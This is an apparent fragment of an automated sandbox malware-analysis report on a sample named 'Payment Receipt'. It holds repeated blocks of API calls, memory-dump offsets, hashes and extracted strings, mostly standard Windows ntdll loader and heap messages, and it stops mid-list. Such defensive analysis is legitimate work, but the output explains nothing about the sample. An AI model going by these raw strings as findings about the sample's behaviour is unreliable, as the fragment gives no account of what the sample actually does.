                                                                      • Snapshot File: hcaresult_0_2_730000_Payment Receipt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: gfff
                                                                      • API String ID: 0-1553575800
                                                                      • Opcode ID: 286f2aa4c7b4f9cd331c25ee6937dff4f5ae17abf8fc72ce496cee5881d3f2cf
                                                                      • Instruction ID: bf645291f6911b18ea005a9dc2b914bb5380230ab92bdbc9f040a4a66b38135d
                                                                      • Opcode Fuzzy Hash: 286f2aa4c7b4f9cd331c25ee6937dff4f5ae17abf8fc72ce496cee5881d3f2cf
                                                                      • Instruction Fuzzy Hash: C65199B2F501190BEB1C891CCC926B8B75AEBD4304F98627EED06DF3C3E5299E104690

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • PostThreadMessageW.USER32(17O3k-2I,00000111,00000000,00000000), ref: 0074456A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016396507.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                      • Associated: 00000000.00000002.2016384888.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_730000_Payment Receipt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: MessagePostThread
                                                                      • String ID: 17O3k-2I$17O3k-2I
                                                                      • API String ID: 1836367815-2455829943
                                                                      • Opcode ID: fcc73c7b8cc7b4af6ded3372faa6a9cb8a3cf5fe988ec8993084df4fd089c6da
                                                                      • Instruction ID: 0e9f8675e5cc2b06e7cbb81886c49b5e5d912aac2f650e56c273d7e3ef4f2db7
                                                                      • Opcode Fuzzy Hash: fcc73c7b8cc7b4af6ded3372faa6a9cb8a3cf5fe988ec8993084df4fd089c6da
                                                                      • Instruction Fuzzy Hash: C91127B2D44148BADB10DBE08C81EEEBF7CEF40354F0440A9F954AB102D77C8E468BA0

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • PostThreadMessageW.USER32(17O3k-2I,00000111,00000000,00000000), ref: 0074456A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016396507.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                      • Associated: 00000000.00000002.2016384888.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_730000_Payment Receipt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: MessagePostThread
                                                                      • String ID: 17O3k-2I$17O3k-2I
                                                                      • API String ID: 1836367815-2455829943
                                                                      • Opcode ID: 20b814a7f5afbd628b3306073f99bc8e32a910d4eb99ef896f182a05ec17f2cf
                                                                      • Instruction ID: 84e8af699bf8c552b687942b6df8f98b0286b854f633d3b2e8405b01bd1130c3
                                                                      • Opcode Fuzzy Hash: 20b814a7f5afbd628b3306073f99bc8e32a910d4eb99ef896f182a05ec17f2cf
                                                                      • Instruction Fuzzy Hash: 2A019BB1D0014CBADB10ABE58C81DEF7B7CEF41794F048065FA1467141D6689E068BB1

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 41 75ceb3-75cef4 call 734903 call 75dd73 RtlFreeHeap
                                                                      APIs
                                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0075CEEF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016396507.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                      • Associated: 00000000.00000002.2016384888.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_730000_Payment Receipt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap
                                                                      • String ID: it
                                                                      • API String ID: 3298025750-124186967
                                                                      • Opcode ID: 4da538de4a336ad0334eb70f56b6e4fc79bf1a1573d1aefafb213d21a41e79ef
                                                                      • Instruction ID: ef5de24cb1e818b76bceff041f790c5ba7fc3916c2a1c45e62a2d63b1356f8d5
                                                                      • Opcode Fuzzy Hash: 4da538de4a336ad0334eb70f56b6e4fc79bf1a1573d1aefafb213d21a41e79ef
                                                                      • Instruction Fuzzy Hash: 2BE06DB1604204BBD624EE58EC45FDB37ACEFC8710F004009F918A7242C7B1BD118BB5

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 294 75ce63-75cea7 call 734903 call 75dd73 RtlAllocateHeap
                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(?,0074EA4E,?,?,00000000,?,0074EA4E,?,?,?), ref: 0075CEA2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016396507.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                      • Associated: 00000000.00000002.2016384888.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_730000_Payment Receipt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: 3f90dd9010fafa6a22c10d148e61cf8cfc03c1fbbda787b6d6695d8e77fb27a4
                                                                      • Instruction ID: ca0733b8fd5b9f29cfbda94f8669a840363cd3db0167f0dd69f43562d01d33ec
                                                                      • Opcode Fuzzy Hash: 3f90dd9010fafa6a22c10d148e61cf8cfc03c1fbbda787b6d6695d8e77fb27a4
                                                                      • Instruction Fuzzy Hash: C6E06DB2214344BBD624EE58DC46FAB77ACEF88710F004049FA08A7242C7B0BD1086B5

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 304 75cf03-75cf38 call 734903 call 75dd73 ExitProcess
                                                                      APIs
                                                                      • ExitProcess.KERNEL32(?,00000000,00000000,?,004D1854,?,?,004D1854), ref: 0075CF33
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016396507.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                      • Associated: 00000000.00000002.2016384888.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_730000_Payment Receipt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExitProcess
                                                                      • String ID:
                                                                      • API String ID: 621844428-0
                                                                      • Opcode ID: 5230a997c7839df9915626ca5e5720bb1dd2af9a8acc6ab531059eb0aa4f8316
                                                                      • Instruction ID: 80de4306c47fb807c22253561ae215934627c8e6d4e42f7cc04ad75246c07cf5
                                                                      • Opcode Fuzzy Hash: 5230a997c7839df9915626ca5e5720bb1dd2af9a8acc6ab531059eb0aa4f8316
                                                                      • Instruction Fuzzy Hash: 42E08C32200614BBD220EA59DC05F9B77ACDFC5711F108096FE08A7286D6B4B9148BF5

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 309 15e2c0a-15e2c0f 310 15e2c1f-15e2c26 LdrInitializeThunk 309->310 311 15e2c11-15e2c18 309->311
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 7b3ed69e72735e8526f9528bac7897cf54025084d5e17d934d9388216d66b734
                                                                      • Instruction ID: 932965a108c9d8be306911566dc32ef95921709c4ffc900eafbba808685d1c03
                                                                      • Opcode Fuzzy Hash: 7b3ed69e72735e8526f9528bac7897cf54025084d5e17d934d9388216d66b734
                                                                      • Instruction Fuzzy Hash: 85B02B31C015C0C5DE01F360860C70B3940B7C0300F19C021D3030A41F4338C0E0E271
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                      • API String ID: 0-2160512332
                                                                      • Opcode ID: 77e68b103c96231b87f5e84bff1f8db5e2bf77184be205c06964e0695fa8045b
                                                                      • Instruction ID: fe97975145bed24bee48efd9915bee2253ff62bc66cb00512301847b3a636a50
                                                                      • Opcode Fuzzy Hash: 77e68b103c96231b87f5e84bff1f8db5e2bf77184be205c06964e0695fa8045b
                                                                      • Instruction Fuzzy Hash: 3A929D71A08B529FE721DE28CC90B6BB7E8BB88750F04491DFA949B350D774E844CF92
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                      • API String ID: 0-3089669407
                                                                      • Opcode ID: 9c4f010f0e796491a512683145738d6f9642800e774fff35802d9347da9038d8
                                                                      • Instruction ID: ddf0cc041c963d0777d4844105f8664a8895ceb5d328ade07611faf09871b18b
                                                                      • Opcode Fuzzy Hash: 9c4f010f0e796491a512683145738d6f9642800e774fff35802d9347da9038d8
                                                                      • Instruction Fuzzy Hash: FF8144B2D1121A7F8B21EED4DDC5EEE77BEBB447547044426FA01FB110E620DE158BA1
                                                                      Strings
                                                                      • PreferredUILanguages, xrefs: 016463D1
                                                                      • @, xrefs: 016463A0
                                                                      • PreferredUILanguagesPending, xrefs: 016461D2
                                                                      • @, xrefs: 01646277
                                                                      • Control Panel\Desktop, xrefs: 0164615E
                                                                      • @, xrefs: 016461B0
                                                                      • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!, xrefs: 01645A84
                                                                      • @, xrefs: 01646027
                                                                      • InstallLanguageFallback, xrefs: 01646050
                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0164635D
                                                                      • @, xrefs: 0164647A
                                                                      • LanguageConfiguration, xrefs: 01646420
                                                                      • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 01645FE1
                                                                      • LanguageConfigurationPending, xrefs: 01646221
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!$@$@$@$@$@$Control Panel\Desktop$InstallLanguageFallback$LanguageConfiguration$LanguageConfigurationPending$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                      • API String ID: 0-1325123933
                                                                      • Opcode ID: 0afe9b799a9fe5c3dd8c2643f8ac853b2ce2d01ee351ac466084412331eda13b
                                                                      • Instruction ID: 2f89c203d584975fee54ed173af43c44b7d889a95c3b35baa04fda7b7c0f84c0
                                                                      • Opcode Fuzzy Hash: 0afe9b799a9fe5c3dd8c2643f8ac853b2ce2d01ee351ac466084412331eda13b
                                                                      • Instruction Fuzzy Hash: E47249719083429BD765DF28C844BABBBE9BFC9704F44492EFA85D7250EB30D905CB92
                                                                      Strings
                                                                      • corrupted critical section, xrefs: 016154C2
                                                                      • Critical section address, xrefs: 01615425, 016154BC, 01615534
                                                                      • Address of the debug info found in the active list., xrefs: 016154AE, 016154FA
                                                                      • Critical section address., xrefs: 01615502
                                                                      • Thread is in a state in which it cannot own a critical section, xrefs: 01615543
                                                                      • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016154E2
                                                                      • double initialized or corrupted critical section, xrefs: 01615508
                                                                      • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016154CE
                                                                      • 8, xrefs: 016152E3
                                                                      • Critical section debug info address, xrefs: 0161541F, 0161552E
                                                                      • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0161540A, 01615496, 01615519
                                                                      • undeleted critical section in freed memory, xrefs: 0161542B
                                                                      • Thread identifier, xrefs: 0161553A
                                                                      • Invalid debug info address of this critical section, xrefs: 016154B6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                      • API String ID: 0-2368682639
                                                                      • Opcode ID: 6018b1d25151b7ad2655095ecce6a11baab3cc0a0c07e671c778807a3530f4fa
                                                                      • Instruction ID: 985bedd9f52f0cc5a887934489c888c49bb6a41c086734a0f411b6d1cbcfd4ee
                                                                      • Opcode Fuzzy Hash: 6018b1d25151b7ad2655095ecce6a11baab3cc0a0c07e671c778807a3530f4fa
                                                                      • Instruction Fuzzy Hash: F181BBB1A40349AFDB20CF99CC45BAEBBB9FB89714F144119F505BB290D3B1A941CBA0
                                                                      Strings
                                                                      • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01612602
                                                                      • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01612409
                                                                      • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 016122E4
                                                                      • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01612498
                                                                      • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01612412
                                                                      • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01612506
                                                                      • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 016124C0
                                                                      • RtlpResolveAssemblyStorageMapEntry, xrefs: 0161261F
                                                                      • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01612624
                                                                      • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 016125EB
                                                                      • @, xrefs: 0161259B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                      • API String ID: 0-4009184096
                                                                      • Opcode ID: 1c2666d32e3e9e1db2c81e95812008e9dd5609ba8952fb054d279ed9ed715521
                                                                      • Instruction ID: 47a9b01a5c3cca8b5d58c993b1bb899b1b5b1a0d90e990f0a9b3828cfabc820d
                                                                      • Opcode Fuzzy Hash: 1c2666d32e3e9e1db2c81e95812008e9dd5609ba8952fb054d279ed9ed715521
                                                                      • Instruction Fuzzy Hash: 370280B1D002299FDB31DB58CC80BDAB7B8BF54704F1445DAE609AB251EB709E84CF99
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                                                      • API String ID: 0-360209818
                                                                      • Opcode ID: b951c7ecf5005d61c3e35ca471c09760e7fbac0211e582b9b0293908354d940a
                                                                      • Instruction ID: 0e6582de0710439107e2ae8a51d28a458f66064a741224b3d8aeb7962c9e4f3c
                                                                      • Opcode Fuzzy Hash: b951c7ecf5005d61c3e35ca471c09760e7fbac0211e582b9b0293908354d940a
                                                                      • Instruction Fuzzy Hash: F36290B5A012298FDB34DF28CC807A9B7B6BF96310F5981DAD649AB344D7325AD1CF40
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                      • API String ID: 0-2515994595
                                                                      • Opcode ID: d153f2483a17a54487fd3f27d46ab0b460fa7290676298d6218de4b2db4b17f6
                                                                      • Instruction ID: 56708fa1dc6bf703efdb967a54f14550c43050184bb61aaff49820cbf72f722c
                                                                      • Opcode Fuzzy Hash: d153f2483a17a54487fd3f27d46ab0b460fa7290676298d6218de4b2db4b17f6
                                                                      • Instruction Fuzzy Hash: 1551CE725053029BC729DF58EC49BABBBECFF98240F14492DE999CB241E770D604CB92
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                      • API String ID: 0-3591852110
                                                                      • Opcode ID: fbc8a5196e1fc41081fe151c465aa21c51e0916db5943da374691909131a0dac
                                                                      • Instruction ID: f6a29aecddc57613a3c08219d6e5d362e8de83e3b564c8abdc355286058f7926
                                                                      • Opcode Fuzzy Hash: fbc8a5196e1fc41081fe151c465aa21c51e0916db5943da374691909131a0dac
                                                                      • Instruction Fuzzy Hash: B312BE70600646DFEB65CF29C895BBABBF1FF0A714F188459E8868B742D734E881CB51
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                      • API String ID: 0-3197712848
                                                                      • Opcode ID: 894da3106542b1b54951da097101a7ce884557e39e65747ea876185ddeaee98e
                                                                      • Instruction ID: 643203b9d37cd4c6c4069b32c428aebbba7fc617dff9bc392d141e9e9aff582e
                                                                      • Opcode Fuzzy Hash: 894da3106542b1b54951da097101a7ce884557e39e65747ea876185ddeaee98e
                                                                      • Instruction Fuzzy Hash: B612DD71A083468FD725DF28C880BEAB7E9BF84704F04491EF9959F291E774D944CBA2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                      • API String ID: 0-3532704233
                                                                      • Opcode ID: f894c92096b63833fe7d1a922bb0b7245d4a3bc40f73fefb867f91a170bd748b
                                                                      • Instruction ID: abd37cafa2d6bceea6cd7acd37df8375c954724f81691b0a08fa8bb031f3f9f5
                                                                      • Opcode Fuzzy Hash: f894c92096b63833fe7d1a922bb0b7245d4a3bc40f73fefb867f91a170bd748b
                                                                      • Instruction Fuzzy Hash: E3B17C719083569FDB25DF68C480A6FBBF8BB88754F01492EFA89DB200D774D9448B93
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                      • API String ID: 0-1357697941
                                                                      • Opcode ID: d16aa739550be98f3e9185daae9d1fee264e8474ba5b10476647bce39c18bdf3
                                                                      • Instruction ID: fd91b92fde96642fa353347f9a84cea8b76f5edd89bd07a8e7f2c80d197b3456
                                                                      • Opcode Fuzzy Hash: d16aa739550be98f3e9185daae9d1fee264e8474ba5b10476647bce39c18bdf3
                                                                      • Instruction Fuzzy Hash: 85F11231A10286EFDF65CF68C881BAABBF5FF0A714F088059ED819B252D734E945CB51
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                      Strings
                                                                      • VerifierFlags, xrefs: 01628C50
                                                                      • VerifierDebug, xrefs: 01628CA5
                                                                      • VerifierDlls, xrefs: 01628CBD
                                                                      • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01628A67
                                                                      • HandleTraces, xrefs: 01628C8F
                                                                      • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01628A3D
                                                                      • AVRF: -*- final list of providers -*- , xrefs: 01628B8F
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                      Strings
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                      Strings
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                      Strings
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                      Strings
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                      Strings
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                      Strings
                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 015F9A11, 015F9A3A
                                                                      • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 015F99ED
                                                                      • Getting the shim engine exports failed with status 0x%08lx, xrefs: 015F9A01
                                                                      • LdrpInitShimEngine, xrefs: 015F99F4, 015F9A07, 015F9A30
                                                                      • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 015F9A2A
                                                                      • apphelp.dll, xrefs: 01596496
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                      Strings
                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01612178
                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 016121BF
                                                                      • SXS: %s() passed the empty activation context, xrefs: 01612165
                                                                      • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0161219F
                                                                      • RtlGetAssemblyStorageRoot, xrefs: 01612160, 0161219A, 016121BA
                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01612180
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                      Strings
                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 015DC6C3
                                                                      • LdrpInitializeProcess, xrefs: 015DC6C4
                                                                      • Unable to build import redirection Table, Status = 0x%x, xrefs: 016181E5
                                                                      • LdrpInitializeImportRedirection, xrefs: 01618177, 016181EB
